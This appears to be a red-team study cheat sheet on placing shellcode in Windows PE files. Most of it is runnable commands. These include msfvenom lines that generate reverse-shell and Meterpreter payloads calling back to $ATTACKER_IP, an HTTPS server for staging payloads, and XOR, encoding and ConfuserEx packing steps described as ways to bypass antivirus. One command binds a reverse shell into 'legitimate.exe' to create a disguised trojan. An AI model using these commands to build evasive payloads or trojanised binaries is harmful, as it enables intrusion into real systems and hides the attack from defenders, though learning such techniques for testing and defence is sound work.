# PE Shellcode ## General PE Information * [PE structure](../../../reverse engineering/windows/portable-executable.md) ## Inserting Shellcode Multiple sections inside the PE can be used to insert the shellcode. This is defined by how the shellcode variable is initialized. When the shellcode is defined as * A __local variable__ inside the main function it will be stored in the `.text` section * A __global variable__ it will be stored in the `.data` section * A __raw binary__ in an icon image and referencing it will store it in the `.rsrc` section * A __custom data section__ it is stored in this unusual section ## Crafting Shellcode * Use msfvenom to generate shellcode which executes the calculator ```sh msfvenom -a x86 --platform windows -p windows/exec cmd=calc.exe -f c -o stage.c ``` * Fill in the the missing parts to make it a valid c file ```sh sed -i '1s/^/#include \n/' stage.c sed -i 's/=/= {/' stage.c sed -i 's/;/};/' stage.c echo -e "int main (void) {\n\tDWORD _protect;\n\tVirtualProtect(buf, sizeof(buf), PAGE_EXECUTE_READ, &_protect);\n\tint (*shellcode)() = (int(*)())(void *)buf;\n\tshellcode();\n\treturn 0;\n}" >> stage.c ``` * Compile it ```sh i686-w64-mingw32-gcc stage.c -o vcalc.exe ``` ### Compile C# The Microsoft Visual C# compiler is called via ```sh csc file.cs ``` ## Staged C2 * The stage on the target needs to download further parts of the shell into memory * These parts may be generated in one of the following ways (all of them will be found through AV) ```sh msfvenom -p windows/x64/shell_reverse_tcp LHOST=$ATTACKER_IP LPORT=4711 -f raw -o shell.bin -b '\x00\x0a\x0d' msfvenom -p windows/x64/shell_reverse_tcp LHOST=$ATTACKER_IP LPORT=4711 -f raw -o shellcode.bin -b '\x00' -e x86/shikata_ga_nai -i 3 -f csharp msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=$ATTACKER_IP LPORT=4711 -f exe --encrypt xor --encrypt-key "verysecretkey" -o xored-revshell.exe ``` * Generate certificate for the webserver ```sh openssl req -new -x509 -keyout webserver.pem -out webserver.pem -days 365 -nodes ``` * Start the webserver ```sh sudo python -c "import http.server, ssl;server_address=('0.0.0.0',443);httpd=http.server.HTTPServer(server_address,http.server.SimpleHTTPRequestHandler);httpd.socket=ssl.wrap_socket(httpd.socket,server_side=True,certfile='webserver.pem',ssl_version=ssl.PROTOCOL_TLSv1_2);httpd.serve_forever()" ``` ## Generate Custom Shellcode * The target is to bypass the AV ### Xor and Encode ```sh msfvenom LHOST=$ATTACKER_IP LPORT=443 -p windows/x64/shell_reverse_tcp -f csharp ``` * Xor and encode the payload, decode the payload on target before it is executed ### Packer * Compress and obfuscate shellcode inside a binary * Obviously, an unpacker is needed inside the binary in addition to the packed code * [mkaring's confuserx](https://github.com/mkaring/ConfuserEx) * Select the directory and binary * Go to settings, use packet and create Rules * Edit the rule as well * Go to Protect and click the button ### Binding * Used to merge binaries * Shellcode will be merged into a legitimate PE and run as an additional thread ```sh msfvenom -x legitimate.exe -k -p windows/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4711 -f exe -o notsolegitimate.exe ``` * Binded PEs need some disguising as well ## Tools & Tipps * [hasherezade's PE-bear](https://github.com/hasherezade/pe-bear-releases.git) gives an overview of the PE's sections * [asmtutor.com](https://asmtutor.com) * [mvelazc0's staged payload](https://github.com/mvelazc0/defcon27_csharp_workshop/blob/master/Labs/lab2/2.cs)